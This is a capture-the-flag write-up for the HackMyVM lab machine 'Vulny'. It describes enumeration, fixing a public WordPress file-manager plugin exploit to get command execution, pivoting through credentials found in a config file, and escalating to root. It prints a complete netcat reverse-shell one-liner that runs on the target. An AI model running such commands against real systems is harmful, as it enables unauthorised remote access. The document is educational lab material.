Machine Information#
| Name | Vulny |
|---|---|
| OS | Linux |
| Author | SML |
| Difficulty | Easy |
| Site | hackmyvm |
Recon and enumeration#
Service scan:
Lets check the webpage:
Default apache2 webpage, we run a gobuster scan.
We find two interesting directories, javascript and secret, let’s check them:
We find something interesting, maybe, that’s the directory we are in right now, so let’s keep that in mind, in the javascript page we dont have enough privileges to view it:
Let’s enumerate the /secret directory:
We find another 3 directories , lets check each one of them:
Later on, I found this list of directories on the /wp-admin directories, but couldn’t access them
Lets check the /uploads directory in /wp-content:
We find a zip-file, lets download it and see its contents:
Among the files of the zip,we see file an .sql file, we research how to open it:
Lets follow this steps.And we find nothing of interest in the database tables(make sure we start the mysql service with sudo service start mysql):
Apparently, this database has no information at all, ideally , it would contain user and password information, I decide to do a little bit of research on the wp file manager and its version to see if it can be exploited in some way.
After a while, a find a github page, containing a exploit for this app, it a plugin for wordpress, and the exploit will a allow remote command execution, now I’ll follow this steps, and see if I can get a reverse shell:
I get an error code:
Lets check the code and see what’s the problem:
We can see, that the default directory I will look up will start with /wp-content ,but, let’s remember our directory enumeration, the /wp-content directory is in the /secret directory:
Also, just for the sake of confirmation, lets check the content of the zip file we downloaded and see if the readme.txt is there:
There it is, so, now ,to make the code work, we just need to add the /secret string to the variable, like this:
It should work now, lets try again:
We find another error, but this time, in my opinion, the programmers part, didn’t it say that version 6.0 was also vulnerable?
It is, lets check the code again:
We found the problem, now, what’s happening here, to sum it up, the > operator greater than is causing the problem, because of this, instead of looking through version 6.0 to 6.8 it will only detect version through 6.1 to 6.8 as vulnerable ,leaving out the 6.0 of the app, let add an = next to the > , to take in count the 6.0 and then let’s try out the code again:
After looking at the code a while, I realize, there are another strings referencing the directory that I did not change:
Initial access and user pivoting#
Now, lets run the exploit again:
There we go! Lets see what we can find:
First, we find the user adrian, lets see if we can access his home folder, it seems we cannot traverse directories, let try that reverse shell we saw earlier on the github page of the exploit:
First we start our listener in our machine :
Then we run the rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR-MACHINE-IP> <PORT-OF-YOUR-CHOOSING> >/tmp/f on the target machine:
Using the following, remember that we have to run a bash shell for this to work, which, in my case I need to do because I’m using zsh, I run the command, and explore ,first, I look for other users:
Besides root, only the user adrian can use a shell session, lets go to his home directory and check its contents:
We can’t access anything interesting in this directory, but now we know we have to pivot to this user, lets check if theres something of interest the /var/www/ directory:
Nothing there…
I decide explore the contents of the wordpress directory, there I find some interesting files:
I inspect the contents of that php file:
Lets try that:
Great! Now lets get that user flag:
Privilege Escalation#
Now, lets run the usual commands to check if we can find any privesc vectors:
We search that program in gtfobins
We try this, and see if we can access the contents of the /root directory:
Even better, we get root! Lets see if we can get that flag:
And we have pwned the machine.
Things I learned from this machine#
- Wordpress vulnerability in versions ranging from (6.0 to 6.8).
- How to access a database I downloaded from a file server with mysql(and that not always those databases will have data on them…).
- Remember to start a bash shell when setting up a full TTY in the netcat listener(if not using bash a main shell session).
- Check config files for useful information.
- Apparently, after checking other writeups, I could’ve used the metasploit framework too for this machine.